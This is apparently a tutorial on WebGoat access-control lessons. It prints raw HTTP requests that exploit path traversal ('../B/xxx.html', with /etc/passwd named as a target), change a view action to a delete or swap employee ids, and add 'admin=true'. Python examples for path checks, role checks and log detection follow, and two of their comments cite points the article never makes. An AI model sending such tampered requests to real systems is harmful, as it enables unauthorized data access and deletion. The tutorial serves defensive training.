WebGoat learning: access control flaws

Source: Internet
Author: User

In a role-based access control solution, a role represents a group of access permissions and privileges, and a user can be assigned one or more roles. Such a solution usually consists of two parts: role permission management (which permissions each role carries) and role allocation (which roles each user holds). A flawed role-based access control scheme may allow a user to act under a role that was never assigned to him/her, or may otherwise permit privilege escalation so that a user gains the access of an unauthorized role.

1. Path-Based Access Control Bypass

In a path-based access control solution, an attacker can traverse directories by supplying relative path information in a request. Using relative paths, the attacker can reach files that the server would refuse to serve if they were requested directly.

For example, consider a seller management system in which each seller may only operate on his/her own order and product information. There are two sellers, A and B. A's product information is stored under /webapps/A/, for example /webapps/A/item1.html. A reaches this information through the product list page: after the server authenticates A, it returns the product list under directory A to the client. When A browses one of its own products, the client sends the following request to the server:

POST http://localhost:8080/WebGoat/attack?Screen=57&menu=200 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 36
Cache-Control: max-age=0
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/WebGoat/attack?Screen=57&menu=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FB890B2A9D89628CF57454C6700CE7DC

File=item1.html&SUBMIT=View+File

After receiving the request, the server reads item1.html from directory A and returns it to the client. A careless programmer did not re-verify that the seller is allowed to access the resolved directory when fetching the product details. An attacker can exploit this negligence by modifying the request parameter to mislead the server, for example as follows:

POST http://localhost:8080/WebGoat/attack?Screen=57&menu=200 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 36
Cache-Control: max-age=0
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/WebGoat/attack?Screen=57&menu=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FB890B2A9D89628CF57454C6700CE7DC

File=../B/xxx.html&SUBMIT=View+File

After receiving the request, the server verifies only that user A is logged on, sets the base directory to /webapps/A/ and then resolves ../B/xxx.html relative to it. The file actually read is seller B's product information, /webapps/B/xxx.html, so B's product details (including cost price information) are leaked to seller A. In a more vulnerable system the leak can be far more serious: if the File parameter can be pointed at a system file such as /etc/passwd, system user information may be obtained.
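The two behaviours described above, side by side, as an added example (this is not WebGoat's code): naive_path() reproduces the flawed lookup that only joins the File parameter onto the seller's directory, and safe_path() is the hardened form, which normalises the candidate and then requires it to remain inside the seller's own directory. The /webapps/<seller>/ layout is taken from the article; the function names and the posixpath-based check are assumptions of this example.

```python
import posixpath

# Assumed directory layout from the article: each seller's files live under /webapps/<seller>/
WEBAPPS_ROOT = "/webapps"


def naive_path(seller: str, requested_file: str) -> str:
    """The flawed lookup the article describes: the server checks that the seller is
    logged in, then joins the File parameter onto the seller's directory without
    checking where the normalised result ends up. '../B/xxx.html' escapes into B's tree."""
    return posixpath.normpath(posixpath.join(WEBAPPS_ROOT, seller, requested_file))


def safe_path(seller: str, requested_file: str):
    """Hardened lookup (added example, not WebGoat code): normalise the candidate path
    and require it to remain inside the seller's own directory. Returns the resolved
    path, or None when the request must be rejected."""
    if not requested_file or "\x00" in requested_file or posixpath.isabs(requested_file):
        return None  # empty, NUL-byte or absolute paths are never legitimate here
    seller_dir = posixpath.normpath(posixpath.join(WEBAPPS_ROOT, seller))
    candidate = posixpath.normpath(posixpath.join(seller_dir, requested_file))
    # commonpath() compares whole path components, so /webapps/AB does not count as
    # "inside" /webapps/A the way a plain startswith() prefix test would allow.
    if posixpath.commonpath([seller_dir, candidate]) != seller_dir:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed inputs: the article's legitimate and traversal requests plus two variants
    for f in ("item1.html", "../B/xxx.html", "/etc/passwd", "sub/../../B/xxx.html"):
        print(f"{f!r:24} naive={naive_path('A', f)!r:24} safe={safe_path('A', f)!r}")
```

Note that naive_path() also shows why the article's /etc/passwd remark holds: posixpath.join() discards everything before an absolute component, so an absolute File value is served from the filesystem root. The hardened check rejects absolute values outright and rejects any normalised result that leaves the seller's directory, whichever traversal spelling is used.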

2. Role-Based Access Control

Many websites use role-based methods to restrict resource access, but developers are prone to negligence when implementing such solutions. For example, both Tom and John may access resource s, but John can also modify and delete s, whereas Tom can only view it. After Tom logs on, the server returns Tom's access permission together with an HTML page that contains only the View button:

After John logs on, the server returns an HTML page with both View and Delete buttons:

Clicking Delete sends the following request to the server:

POST http://localhost:8080/WebGoat/attack?Screen=65&menu=200 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 36
Cache-Control: max-age=0
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/WebGoat/attack?Screen=65&menu=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FB890B2A9D89628CF57454C6700CE7DC

employee_id=105&action=DeleteProfile

After receiving this request, the server executes the delete operation. When Tom views resource s, the client sends the following request to the server:

POST http://localhost:8080/WebGoat/attack?Screen=65&menu=200 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 34
Cache-Control: max-age=0
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/WebGoat/attack?Screen=65&menu=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FB890B2A9D89628CF57454C6700CE7DC

employee_id=105&action=ViewProfile

Once Tom knows this, he can modify his own POST body, changing the parameter string to employee_id=105&action=DeleteProfile, and send it to the server. Because the careless programmer did not re-verify Tom's permissions on the server side, Tom successfully executes the delete operation that only John is entitled to. In the same way, Tom could modify the request to invoke operations reserved for the system administrator (Admin), which threatens the server.

In the view request, Tom can see the detailed information of the profile being viewed.

From the request parameters above, we can see that the record is identified by employee_id. If Tom changes the parameter to employee_id=101 and resends the request, the server returns the following response:

Tom has bypassed the presentation layer and accessed Larry's profile.

To prevent these attacks, server-side code must strengthen the filtering and validation of request parameters and must verify permissions on every request. Do not assume that earlier steps of a workflow were followed, and do not trust any external input parameter; apply stricter checks to sensitive operations such as payment, deletion and price changes. When several interfaces together provide a service, the presentation layer and the internal navigation logic can make the whole process look well controlled, but as long as each interface can be called independently, an attacker will use it to construct requests the designer never expected. Therefore, when designing a system, consider not only the normal flow but also the abnormal (deliberately constructed) cases: perform strict parameter validation and permission verification at every step, and adhere to the principle of never trusting the client.
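The per-request check described above, as an added example that is not WebGoat's code: the decision is made on the server for every request, from the session user and the raw POST body, regardless of which buttons the HTML page showed. It combines the two parts of the role model from the introduction (a role-to-action table, and whether a role may act on profiles other than its own) and fails closed on anything unexpected, including the case-variant action name mentioned above and duplicated parameters. The employee ids 105 and 101 come from the article; the user names, roles and the remaining id are constructed for this example.

```python
from urllib.parse import parse_qs

# Constructed sample data (not from WebGoat): employee ids 105 and 101 appear in the
# article; the roles and John's id are assumptions for this example.
USERS = {
    "tom":   {"employee_id": 105, "role": "employee"},
    "john":  {"employee_id": 106, "role": "manager"},
    "larry": {"employee_id": 101, "role": "employee"},
}

# Role permission management: which actions a role may perform, and whether the role
# may act on profiles other than its own. Action names are an exact-match allowlist,
# so 'deleteprofile' or 'Action=' never match anything and are denied.
ROLE_PERMISSIONS = {
    "employee": {"actions": {"ViewProfile"}, "any_profile": False},
    "manager":  {"actions": {"ViewProfile", "DeleteProfile"}, "any_profile": True},
}


def parse_form(body: str):
    """Parse the urlencoded POST body (e.g. 'employee_id=105&action=DeleteProfile').
    Returns (employee_id, action), or None when either field is missing or malformed."""
    fields = parse_qs(body, keep_blank_values=True)
    ids, actions = fields.get("employee_id", []), fields.get("action", [])
    if len(ids) != 1 or len(actions) != 1 or not ids[0].isdigit():
        return None  # missing, duplicated (parameter pollution) or non-numeric values
    return int(ids[0]), actions[0]


def authorize(username: str, body: str) -> bool:
    """Server-side decision made for every request, independent of which buttons the
    HTML page showed: the role must allow the action, and the target profile must be
    the user's own unless the role may act on any profile. Anything unexpected denies."""
    user = USERS.get(username)
    parsed = parse_form(body)
    if user is None or parsed is None:
        return False
    employee_id, action = parsed
    perms = ROLE_PERMISSIONS.get(user["role"])
    if perms is None or action not in perms["actions"]:
        return False  # unknown role, or an action this role does not have
    return perms["any_profile"] or employee_id == user["employee_id"]


if __name__ == "__main__":
    # Constructed requests: the article's legitimate view, the tampered delete, and the
    # employee_id swap that reached Larry's profile
    for who, body in (("tom", "employee_id=105&action=ViewProfile"),
                      ("tom", "employee_id=105&action=DeleteProfile"),
                      ("tom", "employee_id=101&action=ViewProfile"),
                      ("john", "employee_id=105&action=DeleteProfile")):
        print(f"{who:5} {body:40} -> {'allow' if authorize(who, body) else 'deny'}")
```

The point of the design is that the username comes from the authenticated session, never from the request body, and the body is only used to name the action and the target; both are then checked against the role table on the server. Hiding the Delete button in the HTML is presentation, not authorization.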

3. Remote Admin Access

Many website developers leave special parameters in their scripts. Once the back-end program recognises such a parameter, the visitor's permissions are enlarged and previously inaccessible resources become visible, such as program debugging logs or hidden function menus. A typical case is a parameter like admin=true that developers add to an interface so that debugging information or back-end data can be opened from anywhere. For example, the page http://localhost:8080/WebGoat/attack?Screen=28&menu=2000 normally displays only the current user's identity information. A developer who wants to debug can change the URL to http://localhost:8080/WebGoat/attack?Screen=28&menu=2000&admin=true, and the server then returns the details of all users, which is convenient for debugging over the Internet.


Debugging over the Internet is convenient, but it is just as convenient for unauthorized people: there are no secrets on the Internet. Once such a parameter is discovered by someone else, the corresponding service can be attacked and unnecessary losses may follow. In production, make sure that the Internet-facing service has the corresponding debugging functions disabled.
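A defender's complement to the three lessons above, as an added example (not WebGoat code): a small scan over web access-log lines that flags requests carrying a debug-style parameter such as admin=true, in any letter case, or a directory traversal sequence in a parameter value after URL decoding. The log lines are constructed for this example in common log format and mirror the URLs discussed in the article; the parameter names in DEBUG_PARAMS are an assumed allowlist of names that should never be honoured by an Internet-facing service. Because access logs do not record POST bodies, body parameters such as File= or action= need application-level logging to be caught the same way.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample log lines in common log format (not real WebGoat logs); the URLs
# mirror the ones discussed in the article.
SAMPLE_LOG = """\
127.0.0.1 - guest [10/Apr/2013:10:01:02 +0800] "GET /WebGoat/attack?Screen=28&menu=2000 HTTP/1.1" 200 1532
127.0.0.1 - guest [10/Apr/2013:10:01:15 +0800] "GET /WebGoat/attack?Screen=28&menu=2000&admin=true HTTP/1.1" 200 9817
127.0.0.1 - guest [10/Apr/2013:10:02:40 +0800] "GET /WebGoat/attack?Screen=57&menu=200&File=..%2FB%2Fxxx.html HTTP/1.1" 200 421
127.0.0.1 - guest [10/Apr/2013:10:03:01 +0800] "GET /WebGoat/attack?Screen=57&menu=200&debug=1 HTTP/1.1" 200 3002
127.0.0.1 - guest [10/Apr/2013:10:03:30 +0800] "GET /WebGoat/attack?Screen=28&menu=2000&Admin=true HTTP/1.1" 200 9817
"""

# Assumed allowlist of query parameter names that must never be honoured in production
DEBUG_PARAMS = {"admin", "debug", "test"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def find_suspicious(log_text: str):
    """Return (user, target, reason) tuples for requests that carry a debug-style
    parameter or a '..' path component in any parameter value (after URL decoding)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than crash
        query = urlsplit(m["target"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() in DEBUG_PARAMS:
                hits.append((m["user"], m["target"], f"debug parameter {name}={value}"))
            elif ".." in unquote(value).replace("\\", "/").split("/"):
                # second unquote() catches a once-double-encoded traversal as well
                hits.append((m["user"], m["target"], f"path traversal in {name}"))
    return hits


if __name__ == "__main__":
    for user, target, reason in find_suspicious(SAMPLE_LOG):
        print(f"{user:6} {reason:32} {target}")
```

Matching the parameter name case-insensitively matters because, as the article notes, both admin=true and Admin=true reach the same server-side code; splitting the decoded value on path separators and looking for a whole ".." component avoids false positives on values that merely contain two dots.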
